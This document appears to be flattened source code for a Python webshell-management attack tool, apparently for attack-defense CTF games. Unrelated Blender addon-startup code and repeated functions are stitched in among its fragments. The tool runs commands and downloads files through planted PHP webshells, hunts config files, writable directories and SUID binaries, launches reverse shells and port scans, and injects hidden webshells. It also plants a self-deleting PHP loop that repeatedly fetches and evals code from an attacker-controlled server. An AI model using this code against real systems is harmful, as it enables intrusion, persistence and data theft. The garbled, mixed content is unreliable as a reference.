def download_base(self, path, local_path): Log.info("Ready to downloading file : %s" % path) Log.info("Detacting local file exists...") exists = os.path.exists(local_path) if exists: Log.info("Checking remote file (%s) hash..." % (path)) remote_hash = self.hash_remote_file(path) Log.info("Find md5 of remote file (%s) : %s" % (path, remote_hash)) Log.info("Checking local file (%s) hash..." % (local_path)) local_hash = hash_file(local_path) Log.info("Find md5 of local file (%s) : %s" % (local_path, local_hash)) if remote_hash == local_hash: Log.warning("File haved downloaded! Ignored!") return else: Log.warning("File updated, downloading new version...") else: Log.error("Local file not exists...") result = self.php_code_exec_token( 'echo base64_encode(file_get_contents("%s"));' % (path)) if result[0]: Log.success("Fetch data success! Start saving...") content = result[1] with open(local_path, "wb") as f: Log.info("Saving...") f.write(content.decode("base64")) Log.info("Download finished!") else: Log.error("Fetch data failed!")
def page(self): start = (self.page_number - 1) * self.limit end = start + self.limit try: list = self.collection[start:end] return list except Exception as detail: Log.warning(detail) return []
def page(self): start = (self.page_number - 1) * self.limit end = start + self.limit try: list = self.collection[start:end] return list except Exception as detail: Log.warning(detail) return []
def get_writable_directory(self): command = "find %s -type d -writable" % (self.webroot) output = self.auto_exec(command) if output[0]: if output[1] == "": Log.warning("Nothing found!") else: Log.success("Found : \n%s" % output[1]) else: Log.error("Error occured! %s" % output[1])
def get_config_file(self): keywords = ["config", "db", "database"] for key in keywords: Log.info("Using keyword : [%s]..." % (key)) command = "find %s -name '*%s*'" % (self.webroot, key) output = self.auto_exec(command) if output[0]: if output[1] == "": Log.warning("Nothing found!") else: Log.success("Found : \n%s" % output[1]) else: Log.error("Error occured! %s" % output[1])
def get_suid_binaries(self): paths = ['/usr/local/sbin', '/usr/local/bin', '/usr/sbin', '/usr/bin', '/sbin', '/bin', '/usr/games', '/usr/local/games', '/snap/bin'] for path in paths: command = "find %s -user root -perm -4000 -exec ls -ldb {} \;" % (path) Log.info("Executing : %s" % (command)) output = self.auto_exec(command) if output[0]: if output[1] == "": Log.warning("Nothing found!") else: Log.success("Found : \n%s" % output[1]) else: Log.error("Error occured! %s" % output[1])
def check_connection(self, url): Log.info("Checking the connection to the webshell...") try: response = requests.head(url) code = response.status_code if code != 200: Log.warning("The status code is %d, the webshell may have some problems..." % (response.status_code)) else: Log.success("The status code is %d" % (response.status_code)) return True except: Log.error("Connection error!") return False
def get_disabled_functions(self): if len(self.disabled_functions) != 0: Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n")) return result = self.php_code_exec_token("echo ini_get('disable_functions');") if result[0]: if result[1] == "": Log.warning("No function disabled!") self.disabled_functions = [] else: self.disabled_functions = result[1].split(",")[0:-1] Log.success("Disabled functions : \n%s" % list2string(self.disabled_functions, "\t[", "]\n")) else: Log.error("Error occured! %s" % result[1])
def get_writable_directory(self): command = "find %s -type d -writable" % (self.webroot) output = self.auto_exec(command) if output[0]: if output[1] == "": Log.warning("Nothing found!") return [] else: Log.success("Found : \n%s" % output[1][0:-1]) writable_dirs = [] for d in output[1].split("\n")[0:-1]: if not d.startswith("find: '"): writable_dirs.append(d) return writable_dirs else: Log.error("Error occured! %s" % output[1]) return []
def show_options(self): Log.warning("Options\t\tNecessity\t\tDefault") Log.warning("-------\t\t---------\t\t-------") for key in sorted(self.config.keys()): Log.warning( "%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key)))
def show_options(self): ''' 输出该模块的选项信息 (即之前定义的 config) 由 options 命令触发 通常不需要改动 ''' Log.warning("Options\t\tNecessity\t\tDefault") Log.warning("-------\t\t---------\t\t-------") for key in sorted(self.config.keys()): Log.warning("%s\t\t%s\t\t\t%s" % ( key, self.config[key]["necessity"], self.get_config(key)))
#"space_view3d_Meta-Tools_0-3_tab", "mass_align", "modifier_tool", "subdiv_tool", "wireframe_toggle", "DeadlineBlenderClient", "custom_file_tab", #turns off remap relative. *Addon's cannot be unregistered. Remove the file to permanently remove the addon "cubesurfer", ] import addon_utils for addon in addon_startup_list: try: addon_utils.enable(addon, default_set=True) except: log.warning("Could not enable addon %s - skipped" % addon) else: log.info("Loaded addon %s" % addon) # Setup defaults - base this on the show. TODO: un-hardcode this # Basic render settings bpy.context.scene.render.fps = 24 bpy.context.scene.render.resolution_x = 1440 bpy.context.scene.render.resolution_y = 810 bpy.context.scene.render.resolution_percentage = 100 bpy.context.scene.render.pixel_aspect_x = 1.0 bpy.context.scene.render.pixel_aspect_y = 1.0 # Store the current render engine - we need to restore this after render_engine = bpy.context.scene.render.engine
#"space_view3d_Meta-Tools_0-3_tab", "mass_align", "modifier_tool", "subdiv_tool", "wireframe_toggle", "DeadlineBlenderClient", "custom_file_tab", #turns off remap relative. *Addon's cannot be unregistered. Remove the file to permanently remove the addon "cubesurfer", ] import addon_utils for addon in addon_startup_list: try: addon_utils.enable(addon, default_set=True) except: log.warning("Could not enable addon %s - skipped" % addon) else: log.info("Loaded addon %s" % addon) # Setup defaults - base this on the show. TODO: un-hardcode this # Basic render settings bpy.context.scene.render.fps = 24 bpy.context.scene.render.resolution_x = 1440 bpy.context.scene.render.resolution_y = 810 bpy.context.scene.render.resolution_percentage = 100 bpy.context.scene.render.pixel_aspect_x = 1.0 bpy.context.scene.render.pixel_aspect_y = 1.0 # Store the current render engine - we need to restore this after
def main(): signal.signal(signal.SIGINT, signal_handler) signal.signal(signal.SIGTERM, signal_handler) default_filename = "webshells" banner() webshells = [] if len(sys.argv) == 2: filename = sys.argv[1] Log.info("Loding from file : %s ..." % (filename)) webshells_config = json.load(open(filename)) for webshell_config in webshells_config: webshell = WebShell(webshell_config['url'], webshell_config['method'], webshell_config['password']) if webshell.working: Log.success( "This webshell works well, adding into online list...") SAME_FLAG = False for online_webshell in webshells: if online_webshell.url == webshell.url: Log.warning("Same webshell detected! Skipping...") SAME_FLAG = True break if SAME_FLAG: continue webshells.append(webshell) else: Log.error("This webshell can not work...") Log.info("Loading file finished!") if len(webshells) == 0: Log.error("No webshell works well, exiting...") exit(2) Log.info("%d webshells alive!" % (len(webshells))) Log.info("Entering interactive mode...") elif len(sys.argv) == 4: url = sys.argv[1] method = sys.argv[2] password = sys.argv[3] webshell = WebShell(url, method, password) if webshell.working: Log.success("This webshell works well, adding into online list...") webshells.append(webshell) else: Log.error("This webshell can not work...") exit(3) else: show_help() exit(1) LOCAL_COMMAND_FLAG = True main_help() while True: Log.context("sniper") context_fresh = raw_input("=>") or "h" context = string.lower(context_fresh) if context == "h" or context == "help" or context == "?": main_help() #elif context == "sh" or context == "shell": # shell = Shell(webshell) # shell.interactive() elif context == "rsh" or context == "rshell": Log.info("socat file:`tty`,raw,echo=0 tcp-l:8888") ip = raw_input("[IP] : (%s)" % (get_ip_address())) or get_ip_address() port = raw_input("[PORT] : (8888)") or "8888" Log.info("Starting reverse shell (%s:%s)" % (ip, port)) for webshell in webshells: Log.info(str(webshell.info)) webshell.reverse_shell(ip, port) elif context == "p" or context == "print": for webshell in webshells: Log.info(str(webshell.info)) webshell.print_info() elif context == "pv" or context == "php_version": for webshell in webshells: Log.info(str(webshell.info)) Log.success(webshell.get_php_version()) elif context == "kv" or context == "kernel_version": for webshell in webshells: Log.info(str(webshell.info)) Log.success(webshell.get_kernel_version()) elif context == "c" or context == "config": for webshell in webshells: Log.info(str(webshell.info)) Log.info("Detacting config files...") webshell.get_config_file() elif context == "fwd": for webshell in webshells: Log.info(str(webshell.info)) webshell.get_writable_directory() elif context == "gdf": for webshell in webshells: Log.info(str(webshell.info)) webshell.get_disabled_functions() elif context == "fwpf": for webshell in webshells: Log.info(str(webshell.info)) webshell.get_writable_php_file() elif context == "fsb": for webshell in webshells: Log.info(str(webshell.info)) webshell.get_suid_binaries() elif context == "setr": LOCAL_COMMAND_FLAG = False elif context == "setl": LOCAL_COMMAND_FLAG = True elif context == "dla": path = raw_input( "Input path (%s) : " % webshell.webroot) or (webshell.webroot) args = raw_input("Please custom find args (%s) : " % (" -size 500k")) or " -size 500k" Log.info("Using command : find %s %s" % (path, args)) for webshell in webshells: Log.info(str(webshell.info)) webshell.download_advanced(path, args) elif context == "dl": path = raw_input( "Input path (%s) : " % webshell.webroot) or (webshell.webroot) for webshell in webshells: Log.info(str(webshell.info)) if not webshell.file_exists(path): Log.error("The file [%s] is not exists on the server!" % (path)) continue if webshell.is_directory(path): Log.info( "The target file is a directory, using recursion download..." ) filename_filter = raw_input("Input --name '%s' : " % ("*.php")) or "*.php" webshell.download_recursion(path, filename_filter) else: #filename = path.split("/")[-1] #local_path = raw_input("Input local path (%s) to save the file : " % filename) or (filename) # Log.info("Using root path : [%s] to save!" % (local_path)) Log.info( "The target file is a single file, starting download..." ) webshell.download(path, path) elif context == "ps": hosts = raw_input( "Input hosts (192.168.1.1/24) : ") or "192.168.1.1/24" if not "/" in hosts: Log.error( "Please use the format IP/MASK , if want to scan a single host , set MASK=32" ) continue ports = raw_input("Input ports (21,22,25,80,443,445,3389)" ) or "21,22,25,80,443,445,3389" for webshell in webshells: Log.info(str(webshell.info)) webshell.port_scan(hosts, ports) elif context == "aiw": default_filename = random_string(0x10, string.letters) default_password = md5( md5("%s%s%s" % (salt, default_filename, salt))) filename = raw_input("Filename (.%s.php): " % (default_filename)) or (".%s.php" % (default_filename)) password = raw_input("Password (%s): " % (default_password)) or ("%s" % (default_password)) for webshell in webshells: Log.info(str(webshell.info)) webshell.auto_inject_webshell(filename, password) elif context == "aimw": default_filename = random_string(0x10, string.letters) default_password = md5( md5("%s%s%s" % (salt, default_filename, salt))) filename = raw_input("Filename (.%s.php): " % (default_filename)) or (".%s.php" % (default_filename)) password = raw_input("Password (%s): " % (default_password)) or ("%s" % (default_password)) for webshell in webshells: Log.info(str(webshell.info)) webshell.auto_inject_memery_webshell(filename, password) elif context == "fr": Log.info("Starting flag reaper...") webserver_host = raw_input("[IP] (%s) : " % (get_ip_address())) or get_ip_address() webserver_port = int(raw_input("[PORT] (80) : ") or "80") filename = ".%s.php" % (random_string(0x10, string.letters)) file_content = "ignore_user_abort(true);set_time_limit(0);unlink(__FILE__);while(true){$code = file_get_contents('http://%s:%d/code.txt');eval($code);sleep(5);}" % ( webserver_host, webserver_port) Log.info("Temp memory phpfile : %s" % (file_content)) Log.info("Encoding phpfile...") file_content = '<?php unlink(__FILE__);eval(base64_decode("%s"));?>' % ( file_content.encode("base64").replace("\n", "")) Log.info("Final memory phpfile : %s" % (file_content)) for webshell in webshells: Log.info(str(webshell.info)) result = webshell.auto_inject_flag_reaper( filename, file_content) if result: Log.success( "Please check the web server(%s:%d) log to get your flag!" % (webserver_host, webserver_port)) Log.info("Tips : tail -f /var/log/apache2/access.log") else: Log.error("Starting flag reaper failed!") elif context == "r" or context == "read": filepath = raw_input( "Input file path (/etc/passwd) : ") or "/etc/passwd" for webshell in webshells: Log.info(str(webshell.info)) webshell.read_file(filepath) elif context == "db" or context == "database": ip = raw_input("IP (127.0.0.1): ") or "127.0.0.1" username = raw_input("Username (root): ") or "root" password = raw_input("Password (root): ") or "root" Log.info("Creating connection by [%s:%s] to [%s]..." % (username, password, ip)) for webshell in webshells: Log.info(str(webshell.info)) mysql_connection = Mysql(webshell, ip, username, password) if not mysql_connection.function: Log.error("The target server cannot support mysql!") continue if not mysql_connection.connection_flag: Log.error("Connection failed!") continue Log.success("Connection success!") if mysql_connection.function != "": Log.success("Entering database server interactive mode...") mysql_connection.interactive() else: Log.error("No supported database function!") elif context == "q" or context == "quit" or context == "exit": Log.info("recording this webshell to the log file...") save_webshells(webshells, "%s_%d.json" % (default_filename, time.time())) Log.info("Quiting...") break else: Log.error("Unsupported function!") if LOCAL_COMMAND_FLAG == True: Log.info("Executing command on localhost...") os.system(context_fresh) else: Log.info("Executing command on target server...") for webshell in webshells: Log.info(str(webshell.info)) webshell.auto_exec_print(context_fresh)